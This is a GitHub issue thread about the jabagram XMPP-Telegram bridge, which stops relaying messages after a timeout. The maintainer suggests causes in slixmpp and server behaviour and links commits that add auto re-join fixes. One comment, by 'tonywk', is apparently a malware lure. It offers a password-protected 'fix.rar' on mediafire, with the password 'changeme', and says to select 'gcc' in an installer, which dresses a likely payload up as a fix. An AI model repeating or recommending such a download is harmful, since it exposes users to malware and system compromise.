### ISSUE TITLE
Jabagram does not bridge after a timeout

### ISSUE THREAD

**Issue by n4ch0m4n** [ventureoo/jabagram#3]
Jabagram sometimes does not bridge after a timeout

I'm seeing in the logs that after a timeout, jabagram reconnects to xmpp (I see this because I'm an admin of the xmpp server) and apparently they send the xmpp <-> telegram msg according to the jababram log, but in practice it doesn't happen.

This doesn't happen very often and restarting jabagram makes it work again.

Have you had the same issue?

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ventureoo** [comment]
Yes, it's a known issue. Unfortunately I don't fully understand the causes yet, maybe it's related to slixmpp or server side which rejects connection due to a lot of messages from the bridge side.

**Comment by n4ch0m4n** [comment]
I don't think it's because of the amount of requests, I have groups that have very little activity.

**Comment by ventureoo** [comment]
> I don't think it's because of the amount of requests, I have groups that have very little activity.

I mean, Jabagram can "flood" with reconnect requests as in the case of jabagram_bot@5222.de at night.

**Comment by n4ch0m4n** [comment]
I just noticed that this keeps happening, but unlike before it now works in some groups and not in others.
I restart the service and it works again in all of them.

**Comment by ventureoo** [comment]
> I just noticed that this keeps happening, but unlike before it now works in some groups and not in others. I restart the service and it works again in all of them.

Sorry, but there's no progress so far. I've also noticed that after a while XML streaming from some MUCs starts to just disappear for some unknown reason. I'm not sure if it's really about jabagram or slixmpp library.

**Comment by n4ch0m4n** [comment]
> > I just noticed that this keeps happening, but unlike before it now works in some groups and not in others. I restart the service and it works again in all of them.
> 
> Sorry, but there's no progress so far. I've also noticed that after a while XML streaming from some MUCs starts to just disappear for some unknown reason. I'm not sure if it's really about jabagram or slixmpp library.

Have you checked XEP-0030 and XEP-0199?

https://xmpp.org/extensions/xep-0199.html
https://xmpp.org/extensions/xep-0030.html

There's also discussion about this on https://github.com/louiz/slixmpp.

maybe too sending logouts: https://slixmpp.readthedocs.io/en/latest/getting_started/sendlogout.html

**Comment by n4ch0m4n** [comment]
> > > I just noticed that this keeps happening, but unlike before it now works in some groups and not in others. I restart the service and it works again in all of them.
> > 
> > 
> > Sorry, but there's no progress so far. I've also noticed that after a while XML streaming from some MUCs starts to just disappear for some unknown reason. I'm not sure if it's really about jabagram or slixmpp library.
> 
> Have you checked XEP-0030 and XEP-0199?
> 
> https://xmpp.org/extensions/xep-0199.html https://xmpp.org/extensions/xep-0030.html
> 
> There's also discussion about this on https://github.com/louiz/slixmpp.
> 
> maybe too sending logouts: https://slixmpp.readthedocs.io/en/latest/getting_started/sendlogout.html

Could the issue be related to the rate limits of the server where the MUC is hosted?

**Comment by ventureoo** [comment]
To help this issue I added workaround to auto re-join inside the room (https://github.com/ventureoo/jabagram/commit/1cf734cd864f2bfc4468273696b9e86a7eb44685), since I have suspicions that it was due to accidental kicking the boot from room. Please check to see if it has any effect for you.

**Comment by n4ch0m4n** [comment]
![image](https://github.com/user-attachments/assets/d54dfd13-899d-4352-9431-8f2e85cdd5a8)
this error is ok?

**Comment by ventureoo** [comment]
I've investigated this issue a bit more and hopefully https://github.com/ventureoo/jabagram/commit/7df412db8ce21c435b4cc4e99e8dadabdbaf6336 and https://github.com/ventureoo/jabagram/commit/d765136b11b4805b16d3d6049403f78a3faaebe7 should fix it. 

@n4ch0m4n  Please check if this works for you, or otherwise feel free to reopen the issue.
